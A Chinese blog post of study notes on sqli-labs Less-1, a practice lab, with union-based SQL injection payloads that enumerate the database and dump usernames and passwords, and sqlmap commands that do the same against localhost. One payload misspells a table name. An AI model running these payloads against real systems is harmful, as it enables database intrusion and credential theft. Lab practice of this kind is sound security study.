sqli-labs學習筆記 day1
安裝phpstudy
安裝配置sqli-labs
please input the id as parameter with numeric value
猜測:select *** from *** where id=『x』;(猜測id為文字)
嘗試注入點:?id=1』 and 1=2; --+
字段數猜解:?id=1』 order by n; --+(注意空格替換為+,其中n為猜解的字段數,如果報錯,則說明猜解大於實際,如此進行二分猜解)
回顯點查詢:?id=999』 union select 1,2,3; --+
查詢資料庫版本與路徑:id=999』 union select 1,@@version,@@datadir; --+
查詢使用者與資料庫:id=999』 union select 1,user(),database(); --+
查詢所有表名:?id=999』 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=『security』; --+
查詢所有列名:?id=999』 union select 1,2,group_concat(column_name) from infromation_schema.columns where table_name=『users』; --+
獲得使用者名稱和密碼:?id=999』 union select 1,group_concat(username),group_concat(password) from security.users; --+
xss:?id=999』 union select 1,"",3; --+
sqlmap使用:
測試命令:python sqlmap.py
檢測注入點:python sqlmap.py -u 「http://localhost/sqli-labs-master/less-1/?id=1」
獲取當前使用者與當前資料庫:python sqlmap.py -u 「http://localhost/sqli-labs-master/less-1/?id=1」 --current-user --current-db
查詢資料庫中的所有表:python sqlmap.py -u 「http://localhost/sqli-labs-master/less-1/?id=1」 -d security --tables
查詢欄位名:python sqlmap.py -u 「http://localhost/sqli-labs-master/less-1/?id=1」 -d security -t users --columns
查詢所有記錄:python sqlmap.py -u 「http://localhost/sqli-labs-master/less-1/?id=1」 -d security -t users -c 「username,password」 --dump
2019-02-16 17:26
tiumo 閱讀(
...)
編輯收藏
Sqli labs 學習筆記
資料庫的連線函式 concat和concat ws concat ws的第乙個引數是連線字串的分隔符。user 返回當前資料庫連線使用的使用者 database 返回當前資料庫連線使用的資料庫 version 返回當前資料庫的版本 127.0.0.1 sqli labs less 1 id 1 un...
SQLI LABS學習筆記 四
第十六關 和之前的關卡一樣,修改閉合,無意義的關卡 閉合即可 第十七關 這題從原始碼上看發現 這裡進行了兩次查詢 先查詢了使用者名稱是否存在 再查詢密碼是否匹配這個使用者 那麼我們就需要知道使用者名稱 在知道使用者名稱的前提下來進行注入 在之前的測試知道有admin這個賬戶 所以就用admin來注入...
SQLI LABS修煉筆記(三)
寫在前面 如果該檔案不存在,或因為上面的任一原因而不能被讀出,函式返回空。比較難滿足的 就是許可權,在windows 下,如果ntfs 設定得當,是不能讀取相關的檔案的,當遇到只有 administrators 才能訪問的檔案,users 就別想load file 出來。在實際的注入中,我們有兩個難...